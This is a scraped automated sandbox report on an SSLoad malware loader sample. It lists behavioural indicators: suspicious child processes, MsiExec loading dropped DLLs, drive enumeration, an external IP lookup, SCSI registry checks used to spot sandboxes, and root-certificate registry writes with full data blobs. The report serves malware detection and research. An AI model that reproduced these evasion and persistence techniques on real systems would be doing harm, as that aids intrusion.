ssload | hxxps://malware-traffic-analysis[.]net/2024/04/17/2024-04-17-SSLoad-malware-and-artifacts[.]zip

Analysis

max time kernel
285s
max time network
283s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
13-05-2024 13:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://malware-traffic-analysis.net/2024/04/17/2024-04-17-SSLoad-malware-and-artifacts.zip

Score

10^/10

ssload execution loader

Malware Config

Signatures

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

net.exenet.exenet.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2060	4648	net.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	460	4648	net.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5024	4648	net.exe

SSLoad
SSLoad Unpacked DLL payload.
loader ssload

Detects SSLoad Unpacked payload 1 IoCs

loader

Processes:

resource	yara_rule
behavioral1/memory/1952-291-0x0000000003530000-0x00000000035A3000-memory.dmp	family_ssload

Blocklisted process makes network request 4 IoCs

Processes:

WScript.exeMsiExec.exe

flow pid process

46 3452 WScript.exe
48 3452 WScript.exe
59 1952 MsiExec.exe
61 1952 MsiExec.exe

flow	pid	process
46	3452	WScript.exe
48	3452	WScript.exe
59	1952	MsiExec.exe
61	1952	MsiExec.exe

Loads dropped DLL 15 IoCs

Processes:

MsiExec.exeMsiExec.exeMsiExec.exe

pid	process
3736	MsiExec.exe
3736	MsiExec.exe
3736	MsiExec.exe
3736	MsiExec.exe
3736	MsiExec.exe
3736	MsiExec.exe
5088	MsiExec.exe
5088	MsiExec.exe
5088	MsiExec.exe
5088	MsiExec.exe
5088	MsiExec.exe
5088	MsiExec.exe
1952	MsiExec.exe
1952	MsiExec.exe
1952	MsiExec.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

58 api.ipify.org
59 api.ipify.org

flow	ioc
58	api.ipify.org
59	api.ipify.org

Drops file in Windows directory 9 IoCs

Processes:

msiexec.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\MSI8CC1.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{52EF198D-0C6C-406A-803F-F86D93DD7930}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8D5F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\e5a8be6.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8C34.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\e5a8be6.msi	msiexec.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007

Checks SCSI registry key(s) 3 TTPs 8 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssvc.exetaskmgr.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000072b368a908c284c40000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000072b368a90000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090072b368a9000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d72b368a9000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000072b368a900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 2 IoCs

Processes:

msedge.exeStartMenuExperienceHost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

WScript.exeWScript.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 5c0000000100000004000000001000001900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c040000000100000010000000e94fb54871208c00df70f708ac47085b200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b8200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 1900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 040000000100000010000000e94fb54871208c00df70f708ac47085b0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b81900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b4200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82	WScript.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsiexec.exetaskmgr.exe

pid	process
1796	msedge.exe
1796	msedge.exe
4628	msedge.exe
4628	msedge.exe
4476	identity_helper.exe
4476	identity_helper.exe
4856	msedge.exe
4856	msedge.exe
4212	msiexec.exe
4212	msiexec.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

7zFM.exe

pid process

3316 7zFM.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

msedge.exe

pid process

4628 msedge.exe
4628 msedge.exe
4628 msedge.exe
4628 msedge.exe
4628 msedge.exe
4628 msedge.exe
4628 msedge.exe

pid	process
3316	7zFM.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

7zFM.exemsiexec.exemsiexec.exe

description	pid	process
Token: SeRestorePrivilege	3316	7zFM.exe
Token: 35	3316	7zFM.exe
